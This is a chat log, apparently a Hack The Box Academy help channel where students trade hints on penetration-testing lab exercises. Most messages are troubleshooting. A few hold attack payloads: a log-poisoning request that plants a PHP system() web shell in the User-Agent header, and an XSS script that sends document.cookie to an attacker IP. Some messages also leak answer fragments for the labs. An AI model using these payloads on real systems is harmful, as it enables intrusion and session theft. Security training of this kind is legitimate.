When trying to enumerate a domain behind a specific DNS/Name-Server , then this DNS-Server should have open port 53, right ??
For zone transfers yes
Need a Nudge for Attacking Common Services SQL. Got mssqlsrv creds but looking for a nudge. Dug into the flagDB but not getting any content from it.
that's weird did you see the ||tb_flag|| table in flagDB ?
yeah
Yep.
did you try this command ||SELECT * FROM tb_flag|| ?
while I have you here let me spin it up and DM u, but I'm almost certain I did
sure
Hi. Having problem on STACK-BASED BUFFER OVERFLOWS ON WINDOWS X86 Final Assessment. Someone finished it? DM please
Hello, I can't get past the privileged groups section, I grep the /var/log directories and I get a flag but it doesn't
Anybody know if there also is a module for malware analysis?
I am stuck on file upload attacks modules skills assessment, got to point where I can upload file to server (and find it after the name modification) but I cannot give it any commands as it is .jpeg. how should I continue from here?
Hey, I am stuck on medium assessment. Did you succeed with this? Or could u give any hint?
DM me
Hi, I'm stuck at the module "Attack Common Services - Skill Assessment Medium". Did a scan with nmap first on the top and then on all ports and I'm getting 4 services. However the enumeration did on them didn't get me anywhere. Any tip? Thanks
feel free to DM me
looking for a nudge on how to find valid ad users in the ad skills assessment I
done
yes sorry for replying late
hi everyone im stuck at Firewall and IDS/IPS Evasion - Medium Lab in the nmap academy module. The question requires the DNS version number. I found port 53 to be running the DNS service but the nmap script isn't returning output for some reason. What am I doing wrong? any help is super appreciated
anyone available for a nudge on the first skills assessment of the ad enumeration module?
qubit...it's a while since i have done this... try with source port 53
Dm me
I set the source port to 53 actually here is what my command looks like: nmap 10.129.210.26 -p 53 -sU -sV --script dns-nsid --source-port 53 and I'm getting port 53 in open state with service as domain and version as NLnet Labs NSD
Dm if you want
mh... i think this command will work: sudo nmap -sV -sC -Pn -p- 10.129.63.243
it won't work since
really? Stupid question you replaced the ip with yours? Than there should be a Flag at p53 as version number...starts with HTB{Go
hi there
i would like to ask something about search engine tracker
can anyone discuss it with me?
for some case, discord being a platform which search engine do their tracker abnormally. does anyone also face it?
thx in advance
Hey, can anyone help with Password Attacks Medium Lab?
@brave prawn i might be able to help
Hi everyone, question saying ... Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request
Last request line connection closed
@lapis pivot if you can't get it to route through burp... you can actually find the solution ||in the exploit options in metasploit||
Can someone point me to correct direction with: Getting started - Knowledge check? I got reverse shell, but have hard time doing privilege escalation. I know with Sudo -l that /usr/bin/php can be run without password, but how can I get it to work? Edit: I get "Tee /usr/bin/php: permission denied"
Dm i think I can help
hi i need help i can't login in
is there someone who lives in Morocco
anyone for a nudge on the last question of the ad enumeration skills assessment 1?
@copper creek DM me
@west canopy .. I have checked the options I changed proxi option to 'yes' but still not working
Look at the options... what three words do you see ||next to FILEDATA?||
Am seeing many options like proxi, rhost ,vhost ,SSL ,path
hello i am new here is this channel chat channel?
@west canopy I have set everything ..
I tired of this lab.. please give me the big hint @west canopy
one sec
hi, in module Linux privilege escalation , section special permissions, i find the file with SUID that is different from their output, but it won't count as correct (in the answer)
edit: found, there's one more in the output
Hi Looking for some guidance on question "Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer" hope someone can help
Hi, I'm looking for some guidance on the Intro to Network Traffic Analysis module. Would anyone be able to assist?
Ah there we go nevermind :/
Hello humans
can somebody help me with the "Skills Assessment - File Inclusion"
https://academy.hackthebox.com/module/23/section/513
i have:
||i have the admin panel and know the /ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log path but ether it is buggy or i do something wrong..||
||GET /ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log&cmd=ls HTTP/1.1 Host: 206.189.113.19:31855 Upgrade-Insecure-Requests: 1 User-Agent: <?php system($_GET["cmd"]); ?> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close||
you're overcomplicating it.
god damn wdym
since I had changed the user-agent header, the log does not spit out anything new
no matter what i type in
the header log doesnt change anymore
you may have to respawn and do it again
one sec
i had this bug a few times already..
i click on reset and it resets but the same IP:Port appears
is there a bug on this module ?
i mean if you want you can try it too ..
then you will know what i mean
IP:
http://206.189.113.19:31855/ilf_admin/index.php
can anyone give me a nudge on the assessment for file upload attacks? I think im close, just cant seem to get anything thats "executable", i just get "images with errors" - not sure I understand what adding null will do to the filename
Keep trying different filenames, and dont worry so much about null bytes
Yeah, what I ended up doing was connecting to OpenVPN in the Virtual Machine
hey guys can we connect academy lab to my kali attackbox ?
I tried to connect to my kali using vpn config but it gives this error
you could try a different vpn
https://academy.hackthebox.com/vpn
Hello. I am on the module "Using Web Proxies". I am on the Zap Scanner page. After running an active scan with Zap, I should get a hit on a high vulnerability alert. But all I get are medium and low alerts. (And one informational.) I have followed the instructions on the page. (Although I did not update the security certificate as explained earlier in the module, because I am using a Pwnbox and I thought it was pre-configured.)
Does anyone have any advice?
hello, my terminal in kali linux on VirtualBox responds with errors even if i type the correct commands. what should i do?
Hey! Visit https://academy.hackthebox.com/ sign up and then you will be able to purchase a plan. If you have a registered student email you are eligible for a student discount.
What kind of errors? Have a screenshot or copy paste example?
what commands are you typing and what errors are you getting
i don't want to start now
like is there sth like voucher
like thm does
THM is a subscription based service. HTB Academy is similar but does an honestly overly confusing "cube" system. You'll need to look at that on your own to get an idea of how it works and what would be best for you
Need help with the metasploit framework meterpreter skill
Anyone willing to dm so I can discuss my thoughts?
shoot
4 ex : when i clone into github he keep asking me for username and passwd
i wanna be pentester would u help me!?
when I went for a job interview, the technical test they had was simpler than the cbbh path
I'd give that a crack, make sure you understand whats going on, and then you can probably try to sign on with a company
Can I possibly get a hint or two on Attacking Common Services: DNS? I've tried everything. Fierce, subbrute, subfinder, dig, gobuster. If I get subdomains, I get a whole lot of them, or I get none at all and I'm trying not to chuck my laptop out the window.
if you're doing attacking DNS section on Attacking common services, and subbrute or gobuster is taking too long,
there's a shortcut on how to find all available DNS records. ||if you did an nmap scan you'll find there's port 22 open
turns out to be the same box as attacking ftp service. ssh to the box using the same credential you found
for the user robin.|| On footprinting module there's a DNS section and it explains how to access local DNS configuration
||by doing > cat /etc/bind/named.conf.local|| you'll find all available DNS zones and one of them has the flag.
Yeah, I did the DNS footprinting module. I didn't even think to use ||ftp||
Hello new here if I have lab questions can I post a snippet
Thank you for sharing! This is the answer. Bloody typo...
Please who can help email me please. I need to get remote connect on PWN-Box to windows to resolve question in windows fundamental.
Hi, can someone help me, I can't solve this question What is the FQDN of the host where the last octet ends in "x.x.x.x.203"?
please don't leak your email
Please someone help me, I have spent many hours on this.
Which module?
Footprinting , DNS
Just dm u
hey guys can anyone help me with the initial access to the AD Enumeration & Attacks - Skills Assessment Part 2
guys who can hack an email
hey
Good Morning! Can I get some help with Footprinting SMB. I'm on the last question which is "What is the full path to the SMB share". The hint says C:\ is for only Windows machines.
I've tried variations of:
/Devops/home/sambauser
/home/nobody/sambashare
I've scoured the internet for help, and my last hope is one of you good people.
Dm me
In the setting up module, I can't exactly follow up all the instructions that are given in it.
Because, most of the things that are present in the module and the screenshots with the commands don't work in my VM like it's in the module.
there's tool.list file and other files which are shown in the modules but they aren't present in the VM, so like we have to make the files then download the tools or am I missing something?
Also, in the Operating Systems category, in Windows, is it recommended to configure the bare metal host or make a VM for it?
look at ||responder/inveigh||
has anyone completed the LDAP module? i need help on the final question
Hi; I have problem with Attacking Common Services - Medium. I can not find a username. I tried with smtp-user-enum and DNS lookup, but no results.
Fingerprinting in terms of browsing are the techniques used to gather information about a person or an organization (cookies, canvas fingerprint, WebRTC)
In cybersecurity fingerprinting are the techniques used to gather information about the configuration of a system/network or other infrastructure
Enumeration is listing connected device while fingerprinting deep dives further into ports, installed software and service /OS settings
could someone help with Password Attacks Hard Lab? I tried to crack masterkey of keepass file, but no success. Also tried crack the password of user D on winrm and smb services, but also no success. Mounting nfs is also unuseful. I am stuck and don't know what to do
where is your academy.ovpn file? in Desktop folder?
@brave prawn Both desktop and Download folder
try sudo openvpn ~/Desktop/academy.ovpn
try reinstall openvpn
Or try downloading the file again plus check the vpn section on the getting started module
use the mutated wordlist
do a full port scan and enum the highest port
you mean port 995?
nope higher
I reinstall openvpn and download ovpn file again.
but got the same error
@vast geyser try this #modules message
Hi ,https://kali.download/kali/pool/main/o/openvpn/ this web remove the 2.5.6 version openvpn
I use 2.5.7
i don't think that is an issue
i m using it, but nothing(
the password for that should be a bit over 73000 word in the mutated wordlist
Hi , i solved change download web to http://ftp.debian.org/debian/pool/main/o/openvpn/openvpn_2.5.1-3_amd64.deb
Thanks
Happy Wednesday! Would appreciate a little help troubleshooting problems with guestfish - libguestfs
.
Hi i need help with File Inclusion module - PHP Wrappers. Im able to get the flag executing commands with data and input wrappers but i cant get it with expect. The extension is enabled (i search it in apaches php.ini). This is what i tried: curl -s "<IP>:<PORT>/index.php?language=expect://comand". What am i doing wrong?
Hi, I have problem with Attacking Common Services - Hard. I can do RDP login with F* ** * user, but I can not login to MSSQL
@shadow orbit we should be able to connect with ||windows command line sqlcmd :)||
Hi I got a problem with one of skill assessment every single deployed target was accessible through vpn and now when I'm on the assessment it's just "hanging" in the browser. When I tried curl it it shows me a redirection, when I follow redirection it "hanging" on the terminal. I've checked on two different browsers. When I've checked on pwnbox it works fine. Never had that issue before, is it possible that the problem is not on my side?
@surreal marsh this might sound silly but i would restart your router and download a new vpn.
Reason i say this --- when I was going thru Windows Priv Esc, i simply could not move files over to the windows targets. Could not figure out if it was intended or not and it definitely wasn't , but restarting my router fixed it.
I've replaced the vpn file with new one and restarted the environment few times
ah shoot
what module r u on
if its a docker target we shouldn't need vpn connection i dont think
For the broken Auth skills assessment none of the passwords I use for login for (s.u) are not working my list was narrowed down to 96 lines. I don't know if it's my modified script or I don't have the right password
Can someone give me some help if they're free?
XSS
I guess I have to use pwnbox for this one
can someone please help me with the "Session Security - Skills Assessment"?
https://academy.hackthebox.com/module/153/section/1458
||I have already found a XSS Vector but i cant get it||
||and i found a way to get a cookie with a XSS but how should i get the cookie from the admin ?||
||<script> document.write('<img src="http://10.10.14.111:1337/?c='+document.cookie+'" />'); </script>||
@shadow willow have you played around with ||the api endpoint? If you make a successful api call, which user is revealed? Maybe we can use the api to make that user visit our XSS page....||
damn you are a GOD
i have my moments
does anyone know the correct formatting for reporting module on the first tmux question?
[Key] + [Key] + [Key] -- (etc) -- if you look at the part in the sentence that begins "Once in the session, type" you'll have a better understanding of what I'm saying -- @copper creek
i need a tmux guru to teach me how to scroll while in copy mode
ctrl+d: half-screen forward
ctrl+u: half-screen backward
ctrl+b: full-screen backward
ctrl+f: full-screen forward
ctrl+e: one line scroll forward
ctrl+y: one line scroll backward
/: search forward
?: search backward
let me try this , thank you!
Edit: no dice, thanks tho
Has someone passed the HTB Certified Bug Bounty Hunter?
that didn't work for you?
hold on let me check
for example , i just used python to print numbers 1-100. I am in tmux copy mode... how do i scroll UP while copying?
Like if i wanted to copy everything , 1 through 100? I don't get why i can't figure this out. Also i dont know if it matters but i cant use my page up or page down keys on my laptop
hmm ctrl+u while having something selected works for me
or if i enable mouse scrolling in the conf file, then the copy/paste doesnt work haha
EDIT: i think we might be gucci!
nice
so to copy i just press enter right?
is it normal for my ctrl-shift-v to not work when pasting?
yes
i think
i don't know the default shortcut but i added this to my tmux.conf
bind -T copy-mode-vi v send -X begin-selection
bind -T copy-mode-vi y send -X copy-selection-and-cancel
to copy with y
only works if vi mode is enabled
hello guys can someone help in this questions i am stuck on it in footprinting-SMB
What is the full system path of that specific share?
Hello everyone. As much as I hate to admit this, I am completely new at everything within HTB. I'm currently working in Linux Fundamentals and I am completely lost with the questions in section, "System Information". The first 2 questions I was able to solve. The rest, well for whatever reason I am completely stumped in how to figure out the answers. I have looked and looked and looked and I'm just lost at this point. Anyone with a little advice or suggestions would greatly be appreciated.
@rustic sage i might be able to help, feel free to DM ๐
I'm having a problem with http request module...
it says to look for a Flag request in devtools, but none come up, a 404 comes up as the last request
along with a bunch of pngs
404 get FaviconLoader.jsm is the last thing loaded, no file called flag
@west canopy Watch the ippsecc tmux video I sent you a while ago
it did not work yaoi
it just was not meant to be , and thats ok
i will slowly make new tabs in QTerminal , and somehow find a way to survive without nested SSH sessions
and i can scroll with my mouse while copy and pasting. I mean i get tmux is great, but this is basically a super power
imagine using a mouse in 2022
based
its true bro they r trying 2 censor me
@long plover try running the ||env|| command and read the output carefully... it looks like ||there is a variable called MAIL...?||
np !
hey
Could someone DM me about Attacking Common Services: DNS? I'm still having issues and I don't still have credentials from previous sections, so I can't shortcut it. Nvm. I /finally/ found it
Okay so with Attacking Common Services: Email, I have the credentials, but how do I go about accessing the account?
use telnet to connect to one of the email service running on ||port 143||
Hey, would you like to help me getting this to work? I just can't get it right
Hi I'm struggling with the Skills Assessment - File Inclusion. I already read here that there is an admin panel at ||/ilf_admin/|| How did you find it though? I tried multiple wordlists. Thanks for your help!
try to read the ||index|| file
You mean the HTML-code? Nothing obvious as far as I can see
nope use the lfi vuln to read the ||index|| file you can't just read the web source code
Ok, thx then I think I have not found the first LFI yet.
save
Just to double check my approach - 1. I searched for additional php files 2. I search for existing parameters of the found php files like fuf -w ~/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://167.71.140.137:30050/contact.php?FUZZ=value' -fs 2714 3. I search for valid values of the identified parameters - correct?
no the vulnerable parameter isn't contact.php and also i didn't fuzz anything i just found the vuln and read the file hint with ||base64||
Hi everyone. I'm stuck with SQLMAP ESSENTIALS - Skills Assessment. I've gone through a lot of hints and I'm pretty sure it is not much I'm missing, but I can't figure out the right sqlmap options to find a working sqli. I'm attacking action.php with an json payload and I am using the tamper script mentioned in this chatroom. DM appreciated
did you use the ||TESTPARAMETER (-p)|| tag in sqlmap?
I appreciate your help, Ok then I will go over the content from the module again and try to double check what I missed. Thx!
yes. I point it to ' ||id||'
may I send you my sqlmap command via DM, so you can check, what I might miss?
sure
How to solve the EXE program by angr
Hi guys. Anyone who finished Documentation & Reporting Practice Lab Section from Documentation & Reporting module? Cant solve second question on "After achieving Domain Admin, submit the NTLM hash of the KRBTGT account"
Good Morning! Will someone be as so kind to help me with the DNS module under FOOTPRINTING? Trying to find the FQDN name for the host ending in .203.
I have tried to run the discovery script with the fierce word list and it still doesn't give me the required IP.

Means it's probably in a very short and well known password list
That might be available in seclist
Thanks! @placid quest and a huge lift from @feral stump!
Okay here is a solid for someone in /Footprinting/SMTP section.
Start from the bottom of the list!!
so painful, lol, I can type VRFY pretty competently now.
Hello, I wanted to ask that in the "Setting Up" module, the instructions are given to download windows 10 devVM but I have downloaded the windows 11 devVM which was available on the microsoft website. Will the instructions be followed up to windows 11 too or just windows 10?
Anyone?
Thank you for this. Keep in mind that ZAP seems NOT to add Content-Type when switching methods via DROPDOWN. I opened a feature request for this and I may even fix it myself, I consider this to be a huge bug https://github.com/zaproxy/zaproxy/issues/7440
Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. ___
nmap -Pn -p- 10.129.245.214
All 65535 scanned ports on 10.129.245.214 are in ignored states.
Not shown: 63725 filtered tcp ports (no-response), 1810 filtered tcp ports (host-unreach).
Put 65535. WRONG!
Put 1810. WRONG!
Put 63725. WRONG!
Help me...
Hello. Stuck on one question in "Using Web Proxies". The question is:
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at '/flag.txt'
I ran the ZAP Scanner, a spider, and an AJAX spider. Nothing is giving me a high level alert. Also, my ZAP HUD is viewable, but unresponsive. I'm using a Pwnbox. Does anyone have any suggestions on how to scan for the high level alert?
Is that from one of the Academy questions?
what is the output of your command?
I ran it from a kali vm and used HUD. Had no issues finding the vuln.
Okay. This is probably related to a configuration issue within the pwnbox. I have a Kali VM. I'll try that. Thank you.
Hi
Having trouble with the windows module section: NTFS vs. Share Permissions. Cannot connect to the smbclient I keep getting the same error. Is the SMBclient hackthebox uses outdated? if so that would explain why the syntax may not be working. If anyone knows what Im doing wrong please let me know
I cant post the screenshot here for some reason. :v
Im doing this : smbclient -L 10.129.148.11 -U htb-student
do_connect: Connection to 10.129.148.11 failed (Error NT_STATUS_IO_TIMEOUT)
what happens if you try it without specifying a user?
same error code
sounds like an issue with the target. Respawn and try again
the new target gives the same error
smbclient -L 10.129.105.173 -U htb-student
do_connect: Connection to 10.129.105.173 failed (Error NT_STATUS_IO_TIMEOUT)
is this pwnbox?
openvpn
im not sure why you are using smbclient in this section. It calls for you to rdp to the server
It says in the section that they are going to do SMBclient in the pwnbox so I was trying to follow along so I could see how everything works with one another
did you create the share like they did?
hmm I just fired it up, created the share and sure enough cant reach it. Running nmap now to see if the ports are even open
yeah, no smb ports open on the server.
oh wait, the section tells you that windows defender is blocking smb connections.
Ah gotcha. I'll read things more carefully
Thank you for telling me that although my eyes should've caught that
yep that was the issue. can connect now
Hi all, who has passed Windows Privesc? Passing the module User Account Control, I downloaded the dll in the right path, then I run the tutorial SystemPropertiesAdvanced.exe, but nothing happens. Who has faced this, tell me how you solved it?
hi can someone help me with AD enum
I ran powerview
Get DomainAcls
results came back
no ACEs on the group in question
I'm thinking that this is an Academy problem and not something I'm doing wrong because it seems that the query I'm putting in should get the right answer. Please confirm?
@narrow sable working fine on my end
maybe try and reproduce my command and see if you get the same results
@foggy stirrup ||https://cyberkhalid.github.io/posts/aclgroupaddself/||
Thanks I'll give it a go and then figure out the differences
np
Hi im new to the hack the box academy and am stuck on the SMB section of Footprinting. Could someone walk me through how to do it?
@rigid minnow which question specifically?
@west canopy "Connect to the discovered share and find the flag.txt file. Submit the contents as the answer." Im not sure where to start for this
try using ||smbclient or smbmap to discover and then connect to the available share||
How are you getting it without the -Pn flag, if I don't put in the -Pn it tells me the host seems down.
maybe its a pwnbox vs VM thing?
You're using pwnbox or VM?
Superdrol
lol
I want arm of He-Man vhilst hacking criminalistically...
thats always the end goal
imagine being a giga chad + vigilante hacker simultaneously
nmap -sS -p- -Pn- -T5 10.129.246.19 -v
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 13:12 EDT
Happy 25th Birthday to Nmap, may it live to be 125!
Initiating Parallel DNS resolution of 1 host. at 13:12
Completed Parallel DNS resolution of 1 host. at 13:12, 0.02s elapsed
Initiating SYN Stealth Scan at 13:12
Scanning 10.129.246.19 [65535 ports]
SYN Stealth Scan Timing: About 0.91% done
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.10% done; ETC: 14:08 (0:55:31 remaining)
SYN Stealth Scan Timing: About 4.73% done; ETC: 14:07 (0:52:41 remaining)
SYN Stealth Scan Timing: About 9.39% done; ETC: 14:07 (0:49:53 remaining)
SYN Stealth Scan Timing: About 14.31% done; ETC: 14:07 (0:47:06 remaining)
SYN Stealth Scan Timing: About 19.33% done; ETC: 14:06 (0:44:19 remaining)
SYN Stealth Scan Timing: About 24.35% done; ETC: 14:06 (0:41:32 remaining)
10.129.246.19 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 13:27, 900.09s elapsed (1 host timed out)
Nmap scan report for 10.129.246.19
Host is up.
Skipping host 10.129.246.19 due to host timeout
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 900.25 seconds
Raw packets sent: 35830 (1.577MB) | Rcvd: 902 (64.944KB)
Don't think it worked well
are you running as root/sudo?
its just a next level IDS/IPS
all ports blocked , all the time
the target is literally just a brick plugged into a switch
lol
FBI honeypot
you shouldn't go around port scanning computers without permission
that is the lesson Academy is here to teach you
It would be funny if HTB was a regime funded ruse just to frustrate beginner hackers into not going any further.
you are on a vm right?
ye
are you connected to the vpn?
na I turned it off earlier
need to be connected to hack the box academy vpn
I mean
in order to have network connection with their targets
ye I'm connected to that one
you sure?
Ye I just double-checked it but the non-Pn scan gives same result
"Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"
how did you figure it out?
@narrow sable can you ping the target?
I am on my kali VM, connected to academy vpn, and I can ping the target
PING 10.129.2.49 (10.129.2.49) 56(84) bytes of data.
From 10.10.14.1 icmp_seq=1 Destination Host Unreachable
yea your vpn is not connected i don't think
It's connected but I guess the VPN can't connect to the academy stuff...
i would restart your vm and download a new .ovpn file
maybe select one for a different region
also restart your router
also if you are running another vpn on your host OS it might mess things up, i need to keep my protonvpn turned off on my windows host
Hey does someone have time for helping me out on the Pivoting module on the Remote Reverse Port Forwarding with SSH section?
@zealous fiber i can try, which question(s)?
Hey, can someone help with SQL Attacking? After I connect to mssql, there is blank output, whenever I type command
@brave prawn which module/section? I can test on my end
Attacking Common Services/SQL Attacking
ehhhh sort of working sort of not working? I connected with ||sqsh and tried to 1> SELECT name FROM master.dbo.sysdatabases 2> GO , and i get no output. But if i do 1> use flagDB 2> GO then i do see output.||
ohh now it works .
you are logged in with provided credentials?
yes
hm, ok i will reset machine and target, and try it again, thanks a lot
np
I am on the Footprinting module in SMB and stuck on the question "What is the full system path of that specific share?" Ive tried "home/sambauser/sambashare" but it is not correct
is that the last question of the section?
@west canopy yes
try using ||rpcclient $> netshareenumall||
Update: I was able to find it! thank you @west canopy
nice work mate
Hi I'm facing a problem with the third question of the web proxy module. I deleted the cookie of the original request and set the cookie space as the position of the payload then i added the decoded cookie as prefix and first i encoded the payload in base64 and then in ascii hex but I can't find anything. Can somebody give me a hint?
@rustic sage DM me
@foggy stirrup i think for rubeus kerberoasting we have to specify the domain as well as the user
for example:
Maybe try using powerview to find out which accounts have SPN's and can be kerberoasted?
but how do i request it
if rubeus is broken
i know the acc that has it
I added the SPN
Anyone free to help with The Stack-base buffer overflows on windows x86 module - remote exploitation?
< is the new(/old) semicolon! it was working without it from the Windows VM but not remotely!
how were you able to figure out the NFSW
Good Afternoon Good Hackers! May I discuss an issue I'm having with the Footprinting/IMAP/POP3 module?
Can anyone help with Network Enumeration with Nmap Firewall and IPS/IDS evasion Medium Lab?
Dm me
Dm me
DM me if you still need help
What do you guys think of having the possibility of adding your comments to the current page you're at in a given module?
has anyone completed the Session Attacks Module?
has anyone completed the footprinting SMB part?
sure feel free to dm me if you still have issues with that